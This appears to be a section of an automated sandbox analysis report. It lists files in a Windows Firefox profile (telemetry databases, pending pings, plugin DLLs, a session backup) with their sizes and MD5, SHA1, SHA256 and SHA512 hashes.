C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin
Filesize18KB
MD53113bb84145a97a79e9fb06339b45968
SHA127d4766d320745fb373ce55e5bbcce6966f6921d
SHA2567ddf9ffe0ce4f3bf29d37e4a56cb97044a642a606c8b9dab569b2ac5ea4999bb
SHA5121fcc2ccd373e1cca56bf1687b725693a8881fef6718284cd959d5c10bc0cbeb41088dbb59849c70a744b6bcfbcb7a9f52c96da4d4d72363cbf6a946d45cc8d18
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize23KB
MD5c9f81f2adc08082a47b8abba0c0f4615
SHA1ee37a899188ce0f0498c932bf18849491748c729
SHA256c694f63de3848fd08d4dc8f7dd79e0d59f9f9211d0bb2aea7f68b82d6586ec3f
SHA51294e08b13d911960bbcf390fbf00e83ae907765097369f252bbc18d211400a38b531a9f32cb75a93fe6a311a4db9ba36a55c72c03b9644bd12c10e10c61a927dc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize16KB
MD5e586e67fad979d0a0281817f40a909ba
SHA1da92f8350d5ee2a5da9e2cf73f9d5caa84a9d0a0
SHA25618c4718ad0f2e53a347219192757cfcb5083333aab9ba62ee0af76f80a44f2af
SHA51274921db2b899e6aaf2ccbd050c6d70832a97e484025b710f7b866dddfae7a5be4a10caa3a71930c63c8fe4dd3f138610a3cad043b0611118bdbe8510d7026f0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize16KB
MD5b190569c62915d960a283b5f1c69ef77
SHA109f0810759b499cff8d04aa76304a02843aaf4f0
SHA256b41a9ef8109c891677748f71d6f5ba23192cf10c844ab82108c1ec806af554e4
SHA51232cf657b8d3d3407bbd1ffad3baa49bdea560971379a2f6459ec49fa566b0ad2618caedd400e77064125776d52b81518583dd3dad32b90f510d50b77d9c5a1e5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD51a59f3bc2316245377c897228c14c3d8
SHA1952df27deec5f920dff6f1e47e3f7405ef7c34c4
SHA256d1ce0e74432f42432ea86fb37c593080e13af0bc5e48b47cb0f7ca8ba766bd76
SHA512dd39764bcf1b663340f3ce60c0e0a756b2daca2fafaa63ca9dba841ce52b99644ca65ea00cdc72e41b2f5b15d93651f3cd5fb097caaa79a708920d2eda0a830f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5e4314207cea6cb70efb2bb945b86bb45
SHA15af6449d88c9e6a2679c766d3e1dd4b753400b0c
SHA256f1dcc42d4dc1c17c22090135e24edbb504980eb5afa6963a16fd5b969ed01026
SHA5125fb9cbbbe48e2108278928d436329e0c1c184ed782c4cf11ea36f3ddd4229beb93c64bbb592d9de2d3efae2aa1b8dccdfd1b62a49b5f0316ba7f0215be01f19d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize16KB
MD5c1b7997a95ac5c7bc595985b4fd41b09
SHA14569146ac2a7549733c1579ade62cb4e4fba47b1
SHA256d301b6950eb062ebcf57f0d75e02c60cb58b21730d36cb84903b6c629b6555cc
SHA512f58fd55268320eb257d55ddc1f67a91b7f188eb52db717a5031fc2cb33f43c8681447608188849f3d373397f93f418f7a8a26f9f6ce3921b5ad3a8b9cba84084
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize16KB
MD59f009c5527136e99ba1631120956ca97
SHA1d48802474b1741e82c7875550cbd70d2ffb1b01e
SHA256f1a7cd039b2a00da27562943965f7b8ba4bfd25b259bcb421b5333093055702f
SHA5128250c8a67cf9f45866f4974bf80ee6c6e7ddf5cfedaa7271a05e6ec937056e3571a6e2b3deea75dbda8da336d40044d6520e7c07d96fc01530f92b323841d48d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\5ae08eeb-56ed-468d-a5fa-790fa03c93da
Filesize671B
MD5670608160f10ea6630e7c49de24d5986
SHA1d33d6c66e24377f50bf00a9958b5e047789756d9
SHA256ac8b815e5afebe14ef88ac602390c50d475b9fc14f59139126aa37de798daab6
SHA512f4b89e93f224cf799c3763e28d58ca89fa65aa94f7ace62a5959b579287c2142a11c04d54aa81be1d9021964649270a851878d2c4089fa546ff8a65c30f92b10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\8e31668a-f26d-4bc0-b0d6-1849c15ffd31
Filesize27KB
MD5ff92be69c9d33b39d041a6004bdf4dd9
SHA111fe70f6625333798e257226fff2ace26f3bdbf1
SHA2563342f8d1ccf8e221c005c65f4914784170947a49bd2997bd97f9748896662b51
SHA512a01f6770f638c683e0d127236bae017429a71b2e7fc45f0136a0efa76329ff87046a9097734cfffce1a1763fee420e5e2d5c5fda59c5e73a50ea93fd6508357b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\ba9c0a83-3b27-40fd-a782-d597ac590e62
Filesize982B
MD579d75b19f2b1b585f20b34cfa92dc029
SHA1f626d06490b913e3be1a56429e6cf587c90f12fe
SHA256399939636bcf6a4ac11e964204a9f60decf5a25356854411c86aed2013e32549
SHA5125b3e533c8e179ff542f5ba1cd954a78bf9c333fc3ebaeaec93625bc27bb80eca2b61236a0eb914481d8c69056ff957a5e5a349bc8c32719fe10108dab88f631d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD59b73b918b5fccaa202ee13fda4ba07a7
SHA160ee221cc9c6028611b38159ddc671c7541409f8
SHA25614100f1e9dfa988962bfbc7dda8eb86c4a54a173c8adae7000bdefee5949d18e
SHA512b996bb9049f51fb860b392ca33305ba8edf7dbfc8e52a872e1b9ed39b4cc8bc04f75c2e83cf17d734ba5539b4567e80c02e45f4541e93e73409a4c39baf569ef
-
Filesize
12KB
MD59834be4964407e8b21924115cae7dc67
SHA139bec1bd26532c2fb83cb7f432b880d2179f5a89
SHA256dcb198b0f42c3504504692f75504bdb0cad2cb3c2fca6eaade7a2153e80ac76b
SHA512cd77ec071d0fad7da25b7d7de2c3cc60e9c41a98321d31aa9581925ea007efcdb57a43588659f06f154ad6c5368c4da3c4da666e42d71621eef52411a1b7f4e8
-
Filesize
15KB
MD5913d80fb9e278d08d0c12bc2da0bf2bd
SHA19b188b49dcd5a817f453d2f6d6584ccc71230d98
SHA2567b982305cab002c848966d1702ac66dfe905537b71a795544a2482ca78d83252
SHA512a973d309bef2ae2741dd5e74a1ac088daa8d0242a1e766c68841fce774a3cb83735ae34e0d1b8b4b51b005f7b97c7dbbf98bb2929054eb6c27a3de93c72ad2e4
-
Filesize
10KB
MD551ce66ae2497d368b8ae047989680616
SHA1f55c3629ad9ec0d2a4ed9568708b8ddfbd176a6b
SHA25623e5940a4cfafe399c4a9525a00dc50ff39958e69273cf5d9edad7b690344ed9
SHA512adbf6dd2a0acdb41b62757d794478373cbe2f28c74cde99bbc08c934dbfe32e1f501c7caa41f96da356bc4ea28efd9e07207026055f192005f721de3fdc1a400
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD5edfc95acd39e3a494db1d960b1796c49
SHA128884124f2c9fd57e3d4506ead4084b3bcb9ca2f
SHA256a0d24d6cea8c33627b2c12504a7ffae8f7da3605ee591baeda2866572e2eea20
SHA512700c86cae8b3c5045687dd7da5582768cc971afa6acc1d0f99d240417ccf1f373d55c5deb4c18a1cb996b32aa18647171af02039144efa39022b56d8ad06566e
-
Filesize
256KB
MD58fdf47e0ff70c40ed3a17014aeea4232
SHA1e6256a0159688f0560b015da4d967f41cbf8c9bd
SHA256ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82
SHA512bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be